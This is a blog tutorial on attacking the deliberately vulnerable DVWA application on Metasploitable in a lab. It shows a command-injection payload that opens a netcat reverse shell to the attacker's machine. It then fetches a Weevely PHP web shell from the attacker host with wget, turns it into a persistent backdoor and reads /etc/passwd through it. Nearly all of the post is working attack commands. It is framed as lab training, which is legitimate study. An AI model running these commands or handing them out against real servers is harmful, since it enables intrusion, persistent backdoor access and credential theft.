This post will dive into how we can take advantage of a vulnerability in a web application to gain access and upload a backdoor that we can connect to in the future.

As always, this post is for educational purposes and should not be used on live networks. So we are using our internal network for this demonstration.

We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.

To start with, change the security settings from high to low on DVWA Security Tab above.

Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.

We will enter an IP address and click on submit.

Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888

8888 is the port we want to listen on

Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.

Connection established, we have full control of the web app.

Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt

123456 will be our password which we will use later.

Copy it to:

cp /root/shell.txt /var/www/html

so we can see it in our browser.

Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.

Next we start the server on the Kali machine. Start the server:

service apache2 start

On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.

We still have a netcat connection on the server so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt

and the shell.txt should show uploaded

The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php

Connect to the upload in Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.

:help

this will give you a list of commands you can run on your back door. Interesting ones are:

:system_info

cat /etc/passwd

Another interesting command we can use is :

audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath

is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13